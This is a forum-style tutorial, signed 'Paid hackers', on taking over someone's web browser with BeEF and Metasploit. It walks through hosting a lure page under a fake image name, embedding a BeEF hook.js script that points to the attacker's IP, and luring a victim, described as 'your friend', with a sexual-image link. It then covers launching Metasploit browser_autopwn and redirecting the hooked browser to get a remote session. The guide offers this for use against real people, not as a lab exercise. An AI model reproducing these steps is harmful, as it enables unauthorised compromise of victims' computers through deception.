Hacking with BEEF and Metasploit (IMAGES INCLUDED) - By Paid Hackers

How to hack someone through webbrowser with Metasploit and Beef

First Install Wamp

After installing Wamp go to C drive then the Wamp folder then the folder www delete all files and create a index.html file with no codes
(Remember with no codes)

[Image: 4jkZmx3h.jpg]

Then create a folder as you like I have create folder sweetgirl.jpg

Then insert a any picture as you like

Rename the photo with the name sweetgirl.jpg

[Image: sbINmO9h.jpg]

and create a html file inside it with name index.html

HTML Code


PHP Code:
<html>
<
head>
<
title>sweetgirl.jpgtitle>
<
script src="http://192.168.xxx.xxx:3000/hook.js">






Remove the xxx.xxx with your ip (Important)

Note if your friend is using windows 8 and chrome browser then you must update Beef go to console of BackTrackand type

Code root@bt:~# rm -rf /pentest/web/beef && git clone https://github.com/beefproject/beef.git /pentest/web/beef (NOT NEEDED)

Then go to BackTrack then Application Launcher Menu ---> BackTrack ---> Exploitation Tools ---> Social Engineering Tools ---> Beef XSS Framework---> Beef Installer

It will take some time

[Image: tAXBA2H.png]

[Image: qvb2SUP.png]

After installing go to BackTrack then Application Launcher Menu ---> BackTrack ---> Exploitation Tools ---> Social Engineering Tools ---> Beef XSS Framework---> Beef and run it

[Image: RdiXgqN.png]

After running beef go to 192.168.xxx.xxx:3000\ui\panel and login with your username ---> beef and password ---> beef

[Image: TEy097l.png]

[Image: EONc70L.png]

After that you have to manupulate peoples to open you link tell them like see horny girls pictures here http:\\your external ip\sweetgirl.jpg

And if they will go to your link they will be your Zombie in beef

[Image: A9zDcbkh.jpg]

[Image: yue0oY3.png]

After that head over to metasploit run and type use auxiliary/server/browser_autopwn
set LHOST your ip 192.168.xxx.xxx
set LPORT 80
set URIPATH \
run

[Image: OuJOu6H.png]

At the end of the execution you will get you server link then head over to the beef Control Panel again select the zombie go to Commands then Browser then Hooked Domain and Redirect Browser
enter your server link there and click excute now you have to wait when he will open the browser again and bingo you got the seesion on your computer.

[Image: hQhHNs3h.jpg]

                                 Sincerely Paid hackers